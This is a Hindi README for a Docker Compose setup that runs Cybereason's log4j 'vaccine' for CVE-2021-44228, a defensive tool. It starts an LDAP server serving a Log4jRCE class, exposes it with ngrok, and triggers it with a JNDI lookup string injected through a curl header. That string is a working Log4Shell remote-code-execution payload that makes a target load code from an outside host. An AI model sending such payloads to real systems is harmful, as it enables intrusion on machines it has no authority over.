
log4j2 भेद्यता CVE-2021-44228 के लिए एक टीका वातावरण चलाने हेतु docker compose समाधान
Cybereason द्वारा पेश किए गए log4j वैक्सीन को चलाने का एक कंटेनरीकृत तरीका
इस रिपॉजिटरी को क्लोन करें:
git clone https://github.com/jeffbryner/log4j-docker-vaccine.git
अपने टारगेट की पहुँच वाला सटीक निजी या सार्वजनिक IP/DNS रखने के लिए containers.env फ़ाइल को संपादित करें। डिफ़ॉल्ट एंट्री संभवतः आपके लिए काम नहीं करेगी!
कंटेनर बनाएँ और चलाएँ:
docker-compose -f docker-compose.yml -p vaccine up
अब आपके पास एक सुनने वाला ldap सर्वर है जो एक कमज़ोर log4j इंस्टेंस को इनोक्यूलेट करने के लिए Log4jRCE क्लास सर्व करेगा।
आप चाहें तो ngrok का उपयोग करके इसे इंटरनेट पर एक्सपोज़ कर सकते हैं।
ngrok tcp 1389
आप कुख्यात jndi इनपुट स्ट्रिंग का उपयोग करके एक कमज़ोर log4j इंस्टेंस को इस पर भेज सकते हैं:
${jndi:ldap://<ngrokurlgoeshere>:1389/a}
एक कंटेनर में log4j का जानबूझकर कमज़ोर संस्करण उपलब्ध है:
आप इसे शुरू करने और परीक्षण के लिए उपयोग करने हेतु उनके निर्देशों का पालन कर सकते हैं:
docker build . -t vulnerable-app
docker run -p 8080:8080 --name vulnerable-app vulnerable-app
और निम्न के माध्यम से इनोक्यूलेशन ट्रिगर करें:
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-ip-address-or-dns-name:1389/a'